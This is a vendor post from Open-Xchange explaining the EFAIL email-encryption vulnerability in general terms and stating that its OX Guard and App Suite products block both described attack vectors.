On Monday, a German and Belgian research team posted a paper demonstrating a potential vulnerability in PGP and SMIME encrypted emails, named EFAIL. The described vulnerability may result in some email clients leaking the protected contents. This paper has been picked up by multiple media sources, and some of the early reporting was either not correct or hyperbolic as to the potential impact. Open-Xchange has been actively evaluating this potential vulnerability and are happy to announce that OX Guard does NOT appear to be vulnerable to the EFAIL attack.
First, let's clear up some misconceptions. This vulnerability does not cause your private key to be revealed. Encrypted items are safe until they are decrypted. And a bad actor must first have access to the encrypted item to modify it.
There are two attack vectors described in EFAIL. In the first attack vector, the modification is simple to execute. The encrypted PGP content is wrapped in an image tag. After decryption, the plaintext appears to the browser to be part of the image URL. This would send decrypted content to the attacker. OX Guard is 100% effective in blocking this attack, because when it receives an email with encrypted content, it ignores any unencrypted content.
The second attack is much more difficult. For an attacker to succeed, they must be able to guess the first few words in the encrypted item. This makes attacks on plaintext PGP emails nearly impossible. For MIME encrypted emails, however, the first few words that were encrypted are often the content-type, and thus more likely that an attacker can guess the first few bytes. Through a complex manipulation of the encrypted data, it is possible, knowing the first few words, for an attacker to inject a short image tag at the beginning of the decrypted content, potentially sending decrypted content to the attacker.
Open-Xchange's App Suite, however, doesn't just display any HTML content to the user. App Suite inspects HTML data for malicious code and rejects the malformed injected image tags, and thus also blocking this attack. We have worked hard for years to continuously improve how App Suite inspects and removes unsafe HTML content; this is an example of how good security practice can protect against threat vectors in unexpected ways.
Finally, even though it appears App Suite and OX Guard completely block EFAIL manipulation, we will be adding additional checks to further strengthen our defenses against attack.
If we discover anything additional to these findings with regard to EFAIL, we'll report back here immediately, but in the meantime users of Guard can continue to have trust in the integrity of the encrypted emails they send and receive.